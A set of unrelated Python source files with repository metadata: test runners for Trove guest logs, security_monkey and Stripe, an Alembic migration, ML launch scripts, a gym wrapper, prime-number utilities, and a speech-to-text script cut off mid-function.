self.assert_log_enable(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Restart_Required.name,
expected_published=0, expected_pending=expected_pending)
def run_test_restart_datastore(self, expected_http_code=202):
if self.test_helper.log_enable_requires_restart():
instance_id = self.instance_info.id
# we need to wait until the heartbeat flips the instance
# back into 'ACTIVE' before we issue the restart command
expected_states = ['RESTART_REQUIRED', 'ACTIVE']
self.assert_instance_action(instance_id, expected_states, None)
self.auth_client.instances.restart(instance_id)
self.assert_client_code(expected_http_code)
def run_test_wait_for_restart(self, expected_states=['REBOOT', 'ACTIVE']):
if self.test_helper.log_enable_requires_restart():
self.assert_instance_action(self.instance_info.id,
expected_states, None)
def run_test_log_publish_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_publish(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Published.name,
expected_published=1, expected_pending=0)
def run_test_add_data(self):
self.test_helper.add_data(DataType.micro, self.get_instance_host())
def run_test_verify_data(self):
self.test_helper.verify_data(DataType.micro, self.get_instance_host())
def run_test_log_publish_again_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_publish(
self.admin_client,
log_name,
expected_status=guest_log.LogStatus.Published.name,
expected_published=self._get_last_log_published(log_name),
expected_pending=0)
def run_test_log_generator_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_generator(
self.auth_client,
log_name,
lines=2, expected_lines=2)
def assert_log_generator(self, client, log_name, publish=False,
lines=4, expected_lines=None,
swift_client=None):
self.report.log("Executing log_generator for log '%s' (publish: %s)" %
(log_name, publish))
log_gen = client.instances.log_generator(
self.instance_info.id, log_name,
publish=publish, lines=lines, swift=swift_client)
log_contents = "".join([chunk for chunk in log_gen()])
self.report.log("Returned %d lines for log '%s': %s" % (
len(log_contents.splitlines()), log_name, log_contents))
self._set_last_log_contents(log_name, log_contents)
if expected_lines:
self.assert_equal(expected_lines,
len(log_contents.splitlines()),
"Wrong line count for '%s' log" % log_name)
else:
self.assert_true(len(log_contents.splitlines()) <= lines,
"More than %d lines found for '%s' log" %
(lines, log_name))
def run_test_log_generator_publish_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_generator(
self.auth_client,
log_name, publish=True,
lines=3, expected_lines=3)
def run_test_log_generator_swift_client_user(self):
swift_client = self.swift_client
for log_name in self._get_exposed_user_log_names():
self.assert_log_generator(
self.auth_client,
log_name, publish=True,
lines=3, expected_lines=3,
swift_client=swift_client)
def run_test_add_data_again(self):
# Add some more data so we have at least 3 log data files
self.test_helper.add_data(DataType.micro2, self.get_instance_host())
def run_test_verify_data_again(self):
self.test_helper.verify_data(DataType.micro2, self.get_instance_host())
def run_test_log_generator_user_by_row(self):
log_name = self._get_exposed_user_log_name()
self.assert_log_publish(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Published.name,
expected_published=self._get_last_log_published(log_name),
expected_pending=0)
# Now get the full contents of the log
self.assert_log_generator(self.auth_client, log_name, lines=100000)
log_lines = len(self._get_last_log_contents(log_name).splitlines())
# cap at 100, so the test can't run away if something goes wrong
log_lines = min(log_lines, 100)
# Make sure we get the right number of log lines back each time
for lines in range(1, log_lines):
self.assert_log_generator(
self.auth_client,
log_name, lines=lines, expected_lines=lines)
def run_test_log_save_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_test_log_save(self.auth_client, log_name)
def run_test_log_save_publish_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_test_log_save(self.auth_client, log_name, publish=True)
def assert_test_log_save(self, client, log_name, publish=False):
# generate the file
self.report.log("Executing log_save for log '%s' (publish: %s)" %
(log_name, publish))
with tempfile.NamedTemporaryFile() as temp_file:
client.instances.log_save(self.instance_info.id,
log_name=log_name, publish=publish,
filename=temp_file.name)
file_contents = operating_system.read_file(temp_file.name)
# now grab the contents ourselves
self.assert_log_generator(client, log_name, lines=100000)
# and compare them
self.assert_equal(self._get_last_log_contents(log_name),
file_contents)
def run_test_log_discard_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_discard(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Ready.name,
expected_published=0, expected_pending=1)
def run_test_log_disable_user(self):
expected_status = guest_log.LogStatus.Disabled.name
if self.test_helper.log_enable_requires_restart():
expected_status = guest_log.LogStatus.Restart_Required.name
for log_name in self._get_exposed_user_log_names():
self.assert_log_disable(
self.auth_client,
log_name,
expected_status=expected_status,
expected_published=0, expected_pending=1)
def run_test_log_show_sys(self):
self.assert_log_show(
self.admin_client,
self._get_unexposed_sys_log_name(),
expected_type=guest_log.LogType.SYS.name,
expected_status=guest_log.LogStatus.Ready.name,
expected_published=0, expected_pending=1)
def run_test_log_publish_sys(self):
log_name = self._get_unexposed_sys_log_name()
self.assert_log_publish(
self.admin_client,
log_name,
expected_type=guest_log.LogType.SYS.name,
expected_status=guest_log.LogStatus.Partial.name,
expected_published=1, expected_pending=1)
def run_test_log_publish_again_sys(self):
log_name = self._get_unexposed_sys_log_name()
self.assert_log_publish(
self.admin_client,
log_name,
expected_type=guest_log.LogType.SYS.name,
expected_status=guest_log.LogStatus.Partial.name,
expected_published=self._get_last_log_published(log_name) + 1,
expected_pending=1)
def run_test_log_generator_sys(self):
self.assert_log_generator(
self.admin_client,
self._get_unexposed_sys_log_name(),
lines=4, expected_lines=4)
def run_test_log_generator_publish_sys(self):
self.assert_log_generator(
self.admin_client,
self._get_unexposed_sys_log_name(), publish=True,
lines=4, expected_lines=4)
def run_test_log_generator_swift_client_sys(self):
self.assert_log_generator(
self.admin_client,
self._get_unexposed_sys_log_name(), publish=True,
lines=4, expected_lines=4,
swift_client=self.swift_client)
def run_test_log_save_sys(self):
self.assert_test_log_save(
self.admin_client,
self._get_unexposed_sys_log_name())
def run_test_log_save_publish_sys(self):
self.assert_test_log_save(
self.admin_client,
self._get_unexposed_sys_log_name(),
publish=True)
def run_test_log_discard_sys(self):
self.assert_log_discard(
self.admin_client,
self._get_unexposed_sys_log_name(),
expected_type=guest_log.LogType.SYS.name,
expected_status=guest_log.LogStatus.Ready.name,
expected_published=0, expected_pending=1)
class CassandraGuestLogRunner(GuestLogRunner):
def run_test_log_show(self):
log_pending = self._set_zero_or_none()
self.assert_log_show(self.auth_client,
self._get_exposed_user_log_name(),
expected_published=None,
expected_pending=log_pending)
|
{
"content_hash": "b8e0f2e10251fa267ea5540b823e4308",
"timestamp": "",
"source": "github",
"line_count": 672,
"max_line_length": 79,
"avg_line_length": 44.82738095238095,
"alnum_prop": 0.5731642544150843,
"repo_name": "Tesora-Release/tesora-trove",
"id": "cdd8c6e5fb5903b0fd05151f5d0f6fd6f45f59e0",
"size": "30728",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "trove/tests/scenario/runners/guest_log_runners.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "88"
},
{
"name": "CSS",
"bytes": "21914"
},
{
"name": "JavaScript",
"bytes": "60539"
},
{
"name": "Python",
"bytes": "4614445"
},
{
"name": "Shell",
"bytes": "16661"
},
{
"name": "XSLT",
"bytes": "50542"
}
],
"symlink_target": ""
}
|
"""
.. module: security_monkey.tests.watchers.vpc.test_networkacl
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Bridgewater OSS <opensource@bwater.com>
"""
from security_monkey.tests.watchers import SecurityMonkeyWatcherTestCase
from security_monkey.watchers.vpc.networkacl import NetworkACL
import boto
from moto import mock_sts, mock_ec2_deprecated
from freezegun import freeze_time
class NetworkACLWatcherTestCase(SecurityMonkeyWatcherTestCase):
@freeze_time("2016-07-18 12:00:00")
@mock_sts
@mock_ec2_deprecated
def test_slurp(self):
conn = boto.connect_vpc('the_key', 'the secret')
vpc = conn.create_vpc("10.0.0.0/16")
watcher = NetworkACL(accounts=[self.account.name])
item_list, exception_map = watcher.slurp()
vpc_ids = {nacl.config['vpc_id'] for nacl in item_list}
self.assertIn(vpc.id, vpc_ids)
|
{
"content_hash": "ba9820658143c9a4721735cf28550b5a",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 72,
"avg_line_length": 28.870967741935484,
"alnum_prop": 0.7050279329608938,
"repo_name": "Netflix/security_monkey",
"id": "8b13a3c5873b0048c702d0c93f9e15b8ca9ce131",
"size": "1521",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "security_monkey/tests/watchers/vpc/test_networkacl.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "22837"
},
{
"name": "Dart",
"bytes": "130852"
},
{
"name": "Dockerfile",
"bytes": "3841"
},
{
"name": "HTML",
"bytes": "120266"
},
{
"name": "JavaScript",
"bytes": "13728"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1578684"
},
{
"name": "Shell",
"bytes": "30939"
}
],
"symlink_target": ""
}
|
"""Add Issues
Revision ID: 19471f93d42
Revises: 56bda17c92ee
Create Date: 2015-03-27 16:46:53.627287
"""
# revision identifiers, used by Alembic.
revision = '19471f93d42'
down_revision = '56bda17c92ee'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'issues',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('os_state', sa.String(length=250), nullable=False),
sa.Column('test_plan', sa.Text(), nullable=True),
sa.Column('end_date', sa.Date(), nullable=True),
sa.Column('start_date', sa.Date(), nullable=True),
sa.Column('status', sa.String(length=250), nullable=True),
sa.Column('notes', sa.Text(), nullable=True),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('url', sa.String(length=250), nullable=True),
sa.Column('reference_url', sa.String(length=250), nullable=True),
sa.Column('secondary_contact_id', sa.Integer(), nullable=True),
sa.Column('contact_id', sa.Integer(), nullable=True),
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('slug', sa.String(length=250), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('modified_by_id', sa.Integer(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('context_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['contact_id'], ['people.id'], ),
sa.ForeignKeyConstraint(['context_id'], ['contexts.id'], ),
sa.ForeignKeyConstraint(['secondary_contact_id'], ['people.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('slug', name='uq_issues'),
sa.UniqueConstraint('title', name='uq_t_issues')
)
def downgrade():
op.drop_table('issues')
|
{
"content_hash": "046df8ae3b109d5ce04d072b65ccba16",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 73,
"avg_line_length": 37.625,
"alnum_prop": 0.6528239202657807,
"repo_name": "vladan-m/ggrc-core",
"id": "70d5eea25dd57afaf3df62ab78ca33abdb311d7e",
"size": "1807",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "src/ggrc/migrations/versions/20150327164653_19471f93d42_add_issues.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "230813"
},
{
"name": "Cucumber",
"bytes": "148444"
},
{
"name": "HTML",
"bytes": "6041162"
},
{
"name": "JavaScript",
"bytes": "1893341"
},
{
"name": "Makefile",
"bytes": "5483"
},
{
"name": "Mako",
"bytes": "1720"
},
{
"name": "Python",
"bytes": "1489657"
},
{
"name": "Ruby",
"bytes": "1496"
},
{
"name": "Shell",
"bytes": "11555"
}
],
"symlink_target": ""
}
|
"""Launch script for running a full probabilistic iterative solver baseline."""
from absl import app
from absl import flags
import tensorflow as tf
import tensorflow_datasets as tfds
from metapose import data_utils
from metapose import inference_time_optimization as inf_opt
_INPUT_PATH = flags.DEFINE_string(
    'input_path', '',
    'path to a folder containing a tfrec file and a features.json file')
_OUTPUT_PATH = flags.DEFINE_string(
    'output_path', None,
    'path to the output dataset with refined 3d poses')
_N_STEPS = flags.DEFINE_integer('n_steps', 100, 'optimizer (adam) steps')
_DEBUG_FIRST_N = flags.DEFINE_integer(
'debug_first_n', None, 'read only first n records')
_LEARNING_RATE = flags.DEFINE_float(
'learning_rate', 1e-2, 'optimizer (adam) learning rate')
_REPORT_N_APPROX = flags.DEFINE_integer(
'report_n_approx', 50,
'number of intermediate optimization results to report')
_CAM_SUBSET = flags.DEFINE_list(
'cam_subset', list(map(str, range(4))),
'comma-separated list of camera ids to use, e.g. 3,4,5')
_GT_HEATMAPS = flags.DEFINE_bool(
'gt_heatmaps', False,
'whether to replace heatmaps with fake ground truth heatmaps')
_FAKE_GT_HT_STD = flags.DEFINE_float(
'fake_gt_ht_std', 0.0,
'how much noise to add to positions of means of fake gt heatmaps')
_USE_WEAK_REPR = flags.DEFINE_bool(
'use_weak_repr', False,
'whether to use weak projection to get ground truth heatmaps')
_FAKE_GT_INIT = flags.DEFINE_bool(
'fake_gt_init', False,
'whether to use ground truth instead of monocular 3d predictions')
_RANDOM_INIT = flags.DEFINE_bool(
'random_init', False,
'whether to use random noise instead of monocular 3d predictions')
_EDGE_LENS_LAMBDA = flags.DEFINE_float(
'edge_lens_lambda', 0.0,
'weight of the normalized limb length loss during refinement')
flags.mark_flag_as_required('output_path')
def main(_):
cam_subset = list(map(int, _CAM_SUBSET.value))
n_cam = len(cam_subset)
report_n = (
_N_STEPS.value // (_N_STEPS.value // (_REPORT_N_APPROX.value - 1)) + 1)
output_shape_dtype = {
# optimization results
'loss': ([report_n], tf.float32),
'iters': ([report_n], tf.int32),
'pose3d_opt_preds': ([report_n, 17, 3], tf.float32),
'cam_rot_opt_preds': ([report_n, n_cam, 3, 3], tf.float32),
'scale_opt_preds': ([report_n, n_cam], tf.float32),
'shift_opt_preds': ([report_n, n_cam, 3], tf.float32),
# metrics
'pose2d_opt_preds': ([report_n, n_cam, 17, 2], tf.float32),
'pose3d_gt_aligned_pred_3d_proj': ([report_n, n_cam, 17, 2], tf.float32),
'pose3d_pred_pmpjpe': ([report_n], tf.float32),
'pose2d_pred_err': ([report_n], tf.float32),
'pose2d_pred_vs_posenet_err': ([report_n], tf.float32),
'pose2d_gt_posenet_err_mean': ([], tf.float32),
'pose3d_gt_backaligned_pose2d_gt_err': ([report_n], tf.float32),
# input data
'pose3d': ([17, 3], tf.float64),
'cam_pose3d': ([n_cam, 3], tf.float64),
'cam_rot': ([n_cam, 3, 3], tf.float64),
'cam_intr': ([n_cam, 4], tf.float64),
'cam_kd': ([n_cam, 5], tf.float64),
'pose2d_gt': ([n_cam, 17, 2], tf.float64),
'pose2d_repr': ([n_cam, 17, 2], tf.float64),
'heatmaps': ([n_cam, 17, 4, 4], tf.float64),
# note! pose2d_pred is actually the "mean heatmap" 2D pred
'pose2d_pred': ([n_cam, 17, 2], tf.float64),
'keys': ([n_cam], tf.string),
'bboxes': ([n_cam, 4], tf.int32),
'pose3d_epi_pred': ([n_cam, 17, 3], tf.float32),
'cam_subset': ([n_cam], tf.int32),
}
output_spec = tfds.features.FeaturesDict({
k: tfds.features.Tensor(shape=s, dtype=d)
for k, (s, d) in output_shape_dtype.items()
})
ds = data_utils.read_tfrec_feature_dict_ds(_INPUT_PATH.value)
if _DEBUG_FIRST_N.value is not None:
ds = ds.take(_DEBUG_FIRST_N.value)
dataset = []
for _, data_rec in ds:
opt_stats = inf_opt.run_inference_optimization(
data_rec=data_rec,
opt_steps=_N_STEPS.value,
report_n_results=_REPORT_N_APPROX.value,
cam_subset=cam_subset,
edge_lens_lambda=_EDGE_LENS_LAMBDA.value,
fake_gt_heatmaps=_GT_HEATMAPS.value,
fake_gt_ht_std=_FAKE_GT_HT_STD.value,
fake_gt_init=_FAKE_GT_INIT.value,
random_init=_RANDOM_INIT.value,
recompute_weak_repr=_USE_WEAK_REPR.value,
learning_rate=_LEARNING_RATE.value)
print('pmpjpe', opt_stats['pose3d_pred_pmpjpe'][-1])
dataset.append(opt_stats)
data_utils.write_tfrec_feature_dict_ds(
dataset, output_spec, _OUTPUT_PATH.value)
if __name__ == '__main__':
app.run(main)
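# Example invocation (paths are placeholders; the flags are the ones defined above):
#     python launch_iterative_solver.py --input_path=/tmp/in \
#         --output_path=/tmp/out --n_steps=200 --cam_subset=0,1,2,3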
|
{
"content_hash": "d4a4f9e843fbdfaeb276ebd52a1d6d71",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 79,
"avg_line_length": 37.03174603174603,
"alnum_prop": 0.6328761251607372,
"repo_name": "google-research/google-research",
"id": "5cb5891ba04d0b3c481ca3b5fc5261fc95bd5a1e",
"size": "5274",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "metapose/launch_iterative_solver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "9817"
},
{
"name": "C++",
"bytes": "4166670"
},
{
"name": "CMake",
"bytes": "6412"
},
{
"name": "CSS",
"bytes": "27092"
},
{
"name": "Cuda",
"bytes": "1431"
},
{
"name": "Dockerfile",
"bytes": "7145"
},
{
"name": "Gnuplot",
"bytes": "11125"
},
{
"name": "HTML",
"bytes": "77599"
},
{
"name": "ImageJ Macro",
"bytes": "50488"
},
{
"name": "Java",
"bytes": "487585"
},
{
"name": "JavaScript",
"bytes": "896512"
},
{
"name": "Julia",
"bytes": "67986"
},
{
"name": "Jupyter Notebook",
"bytes": "71290299"
},
{
"name": "Lua",
"bytes": "29905"
},
{
"name": "MATLAB",
"bytes": "103813"
},
{
"name": "Makefile",
"bytes": "5636"
},
{
"name": "NASL",
"bytes": "63883"
},
{
"name": "Perl",
"bytes": "8590"
},
{
"name": "Python",
"bytes": "53790200"
},
{
"name": "R",
"bytes": "101058"
},
{
"name": "Roff",
"bytes": "1208"
},
{
"name": "Rust",
"bytes": "2389"
},
{
"name": "Shell",
"bytes": "730444"
},
{
"name": "Smarty",
"bytes": "5966"
},
{
"name": "Starlark",
"bytes": "245038"
}
],
"symlink_target": ""
}
|
"""Allows using emdp as a gym environment."""
import numpy as np
import gym
from gym import spaces
import emdp.utils as utils
def gymify(mdp, **kwargs):
return GymToMDP(mdp, **kwargs)
class GymToMDP(gym.Env):
def __init__(self, mdp, observation_one_hot=True):
"""
:param mdp: The emdp.MDP object to wrap.
:param observation_one_hot: Boolean indicating if the observation space
should be one hot or an integer.
"""
self.mdp = mdp
if observation_one_hot:
self.observation_space = spaces.Box(
low=0, high=1, shape=(self.mdp.state_space, ), dtype=np.int32)
else:
self.observation_space = spaces.Discrete(self.mdp.state_space)
self.action_space = spaces.Discrete(self.mdp.action_space)
self._obs_one_hot = observation_one_hot
def reset(self):
return self.maybe_convert_state(self.mdp.reset())
def step(self, action):
state, reward, done, info = self.mdp.step(action)
return (self.maybe_convert_state(state),
reward, done, info)
def seed(self, seed):
self.mdp.set_seed(seed)
    # TODO: implement rendering
def render(self):
pass
def maybe_convert_state(self, state):
if self._obs_one_hot:
return state
else:
return utils.convert_onehot_to_int(state)
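# Minimal usage sketch (`mdp` stands for any emdp.MDP instance; illustrative only):
#     env = gymify(mdp, observation_one_hot=False)
#     obs = env.reset()
#     obs, reward, done, info = env.step(env.action_space.sample())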
|
{
"content_hash": "3f6e58017a11e39c6192771a38ee2797",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 79,
"avg_line_length": 26.826923076923077,
"alnum_prop": 0.6,
"repo_name": "zafarali/emdp",
"id": "15b0ae9bd8ca0da84d79cdc194a66ff1203252f3",
"size": "1395",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "emdp/emdp_gym/gym_wrap.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "72669"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
import stripe
TEST_RESOURCE_ID = "ich_123"
class TestCardholder(object):
def test_is_creatable(self, request_mock):
resource = stripe.issuing.Cardholder.create(
billing={
"address": {
"city": "city",
"country": "US",
"line1": "line1",
"postal_code": "postal_code",
}
},
name="Jenny Rosen",
type="individual",
)
request_mock.assert_requested("post", "/v1/issuing/cardholders")
assert isinstance(resource, stripe.issuing.Cardholder)
def test_is_listable(self, request_mock):
resources = stripe.issuing.Cardholder.list()
request_mock.assert_requested("get", "/v1/issuing/cardholders")
assert isinstance(resources.data, list)
assert isinstance(resources.data[0], stripe.issuing.Cardholder)
def test_is_modifiable(self, request_mock):
resource = stripe.issuing.Cardholder.modify(
TEST_RESOURCE_ID, metadata={"key": "value"}
)
request_mock.assert_requested(
"post", "/v1/issuing/cardholders/%s" % TEST_RESOURCE_ID
)
assert isinstance(resource, stripe.issuing.Cardholder)
def test_is_retrievable(self, request_mock):
resource = stripe.issuing.Cardholder.retrieve(TEST_RESOURCE_ID)
request_mock.assert_requested(
"get", "/v1/issuing/cardholders/%s" % TEST_RESOURCE_ID
)
assert isinstance(resource, stripe.issuing.Cardholder)
def test_is_saveable(self, request_mock):
resource = stripe.issuing.Cardholder.retrieve(TEST_RESOURCE_ID)
resource.metadata["key"] = "value"
cardholder = resource.save()
request_mock.assert_requested(
"post", "/v1/issuing/cardholders/%s" % TEST_RESOURCE_ID
)
assert isinstance(resource, stripe.issuing.Cardholder)
assert resource is cardholder
|
{
"content_hash": "e3a28e33db9f1e270d14d30b366be15a",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 72,
"avg_line_length": 36.69642857142857,
"alnum_prop": 0.6072992700729927,
"repo_name": "stripe/stripe-python",
"id": "81c789f12e3be6b35057d21bf335e3680c078ffa",
"size": "2055",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/api_resources/issuing/test_cardholder.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1198"
},
{
"name": "Python",
"bytes": "748390"
}
],
"symlink_target": ""
}
|
from bisect import bisect_right
from itertools import chain, count
from typing import Generator, List, Sequence, Tuple
from ..sqrt import fast_fsqrt as fsqrt
def is_prime(n: int, sieve: List[int]=None) -> bool:
if n <= 1:
return False
if sieve is None:
for factor in range(2, fsqrt(n) + 1):
if n % factor == 0:
return False
elif n <= sieve[-1]:
index = bisect_right(sieve, n)
if not index or sieve[index - 1] != n:
return False
elif n <= sieve[-1] ** 2:
fsqrt_n = fsqrt(n)
for factor in sieve:
if factor > fsqrt_n:
break
if n % factor == 0:
return False
else:
for factor in chain(sieve, range(sieve[-1] + 1, fsqrt(n) + 1)):
if n % factor == 0:
return False
return True
def smallest_prime_factor(n: int, sieve: Sequence[int]=None) -> int:
if n <= 1:
raise ValueError(f'Cannot find smallest prime factor of {n}.')
for factor in range(2, fsqrt(n) + 1) if sieve is None else sieve:
if n % factor == 0:
return factor
return n
def generate_prime_factors(n: int, sieve: Sequence[int]=None) -> \
Generator[int, None, None]:
while n > 1:
factor = smallest_prime_factor(n, sieve)
yield factor
while n % factor == 0:
n //= factor
def generate_prime_factors_multiplicity(n: int, sieve: Sequence[int] = None) \
-> Generator[Tuple[int, int], None, None]:
while n > 1:
factor = smallest_prime_factor(n, sieve)
multiplicity = 0
while n % factor == 0:
n //= factor
multiplicity += 1
yield factor, multiplicity
def largest_prime_factor(n: int) -> int:
if n <= 1:
raise ValueError(f'Cannot find largest prime factor of {n}.')
bound = fsqrt(n) + 1
factor = 2
while factor <= bound:
if n % factor == 0:
while n % factor == 0:
n //= factor
if n == 1:
return factor
bound = fsqrt(n) + 1
factor += 1
return n
def prime_sieve(n: int) -> Sequence[int]:
"""
From here:
http://stackoverflow.com/questions/2068372/fastest-way-to-list-all
-primes-below-n/3035188#3035188
"""
import numpy as np
    if n < 2:
        return []
    if n < 6:  # the wheel-based sieve below assumes n >= 6
        return [p for p in (2, 3, 5) if p < n]
    sieve = np.ones(n // 3 + (n % 6 == 2), dtype=bool)
for i in range(1, fsqrt(n) // 3 + 1):
if sieve[i]:
k = 3 * i + 1 | 1
sieve[k * k // 3::2 * k] = False
sieve[k * (k - 2 * (i & 1) + 4) // 3::2 * k] = False
return np.r_[2, 3, ((3 * np.nonzero(sieve)[0][1:] + 1) | 1)].tolist()
def primes_sequence() -> Generator[int, None, None]:
    # count(2) yields successive candidates; no manual increment is needed
    for n in count(2):
        if is_prime(n):
            yield n
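# Illustrative usage of the helpers above:
#     sieve = prime_sieve(100)
#     assert is_prime(97, sieve)
#     assert list(generate_prime_factors_multiplicity(360)) == [(2, 3), (3, 2), (5, 1)]
#     assert largest_prime_factor(13195) == 29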
|
{
"content_hash": "0abd205a454cc6d6aad26c222c105586",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 78,
"avg_line_length": 23.84426229508197,
"alnum_prop": 0.5139223100721898,
"repo_name": "cryvate/project-euler",
"id": "2bebc5998efe6dc5c1447264fed2d18705706a38",
"size": "2909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project_euler/library/number_theory/primes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "144699"
},
{
"name": "Shell",
"bytes": "2323"
}
],
"symlink_target": ""
}
|
import json
import os
import sys
from collections import namedtuple
from datetime import datetime
from config_util import parse_args, parse_contexts, generate_file_path
from train import do_training
import mxnet as mx
from stt_io_iter import STTIter
from label_util import LabelUtil
from log_util import LogUtil
import numpy as np
from stt_datagenerator import DataGenerator
from stt_metric import STTMetric
from stt_bi_graphemes_util import generate_bi_graphemes_dictionary
from stt_bucketing_module import STTBucketingModule
from stt_io_bucketingiter import BucketSTTIter
sys.path.insert(0, "../../python")
# os.environ['MXNET_ENGINE_TYPE'] = "NaiveEngine"
os.environ['MXNET_ENGINE_TYPE'] = "ThreadedEnginePerDevice"
os.environ['MXNET_ENABLE_GPU_P2P'] = "0"
class WHCS:
width = 0
height = 0
channel = 0
stride = 0
class ConfigLogger(object):
def __init__(self, log):
self.__log = log
def __call__(self, config):
self.__log.info("Config:")
config.write(self)
def write(self, data):
# stripping the data makes the output nicer and avoids empty lines
line = data.strip()
self.__log.info(line)
def load_labelutil(labelUtil, is_bi_graphemes, language="en"):
if language == "en":
if is_bi_graphemes:
try:
labelUtil.load_unicode_set("resources/unicodemap_en_baidu_bi_graphemes.csv")
            except IOError:
                raise Exception("resources/unicodemap_en_baidu_bi_graphemes.csv does not exist." +
                                " Please set overwrite_bi_graphemes_dictionary to True in the train section")
else:
labelUtil.load_unicode_set("resources/unicodemap_en_baidu.csv")
else:
raise Exception("Error: Language Type: %s" % language)
def load_data(args):
mode = args.config.get('common', 'mode')
if mode not in ['train', 'predict', 'load']:
raise Exception('mode must be the one of the followings - train,predict,load')
batch_size = args.config.getint('common', 'batch_size')
whcs = WHCS()
whcs.width = args.config.getint('data', 'width')
whcs.height = args.config.getint('data', 'height')
whcs.channel = args.config.getint('data', 'channel')
whcs.stride = args.config.getint('data', 'stride')
save_dir = 'checkpoints'
model_name = args.config.get('common', 'prefix')
is_bi_graphemes = args.config.getboolean('common', 'is_bi_graphemes')
overwrite_meta_files = args.config.getboolean('train', 'overwrite_meta_files')
overwrite_bi_graphemes_dictionary = args.config.getboolean('train', 'overwrite_bi_graphemes_dictionary')
max_duration = args.config.getfloat('data', 'max_duration')
language = args.config.get('data', 'language')
log = LogUtil().getlogger()
labelUtil = LabelUtil.getInstance()
if mode == "train" or mode == "load":
data_json = args.config.get('data', 'train_json')
val_json = args.config.get('data', 'val_json')
datagen = DataGenerator(save_dir=save_dir, model_name=model_name)
datagen.load_train_data(data_json, max_duration=max_duration)
if is_bi_graphemes:
if not os.path.isfile("resources/unicodemap_en_baidu_bi_graphemes.csv") or overwrite_bi_graphemes_dictionary:
load_labelutil(labelUtil=labelUtil, is_bi_graphemes=False, language=language)
generate_bi_graphemes_dictionary(datagen.train_texts)
load_labelutil(labelUtil=labelUtil, is_bi_graphemes=is_bi_graphemes, language=language)
args.config.set('arch', 'n_classes', str(labelUtil.get_count()))
if mode == "train":
if overwrite_meta_files:
log.info("Generate mean and std from samples")
normalize_target_k = args.config.getint('train', 'normalize_target_k')
datagen.sample_normalize(normalize_target_k, True)
else:
log.info("Read mean and std from meta files")
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
datagen.load_validation_data(val_json, max_duration=max_duration)
elif mode == "load":
# get feat_mean and feat_std to normalize dataset
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
datagen.load_validation_data(val_json, max_duration=max_duration)
elif mode == 'predict':
test_json = args.config.get('data', 'test_json')
datagen = DataGenerator(save_dir=save_dir, model_name=model_name)
datagen.load_train_data(test_json, max_duration=max_duration)
        load_labelutil(labelUtil, is_bi_graphemes, language="en")
args.config.set('arch', 'n_classes', str(labelUtil.get_count()))
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
is_batchnorm = args.config.getboolean('arch', 'is_batchnorm')
if batch_size == 1 and is_batchnorm and (mode == 'train' or mode == 'load'):
raise Warning('batch size 1 is too small for is_batchnorm')
    # sort file paths by their duration in ascending order to implement SortaGrad
if mode == "train" or mode == "load":
max_t_count = datagen.get_max_seq_length(partition="train")
max_label_length = \
datagen.get_max_label_length(partition="train", is_bi_graphemes=is_bi_graphemes)
elif mode == "predict":
max_t_count = datagen.get_max_seq_length(partition="test")
max_label_length = \
datagen.get_max_label_length(partition="test", is_bi_graphemes=is_bi_graphemes)
args.config.set('arch', 'max_t_count', str(max_t_count))
args.config.set('arch', 'max_label_length', str(max_label_length))
from importlib import import_module
prepare_data_template = import_module(args.config.get('arch', 'arch_file'))
init_states = prepare_data_template.prepare_data(args)
sort_by_duration = (mode == "train")
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
save_feature_as_csvfile = args.config.getboolean('train', 'save_feature_as_csvfile')
if is_bucketing:
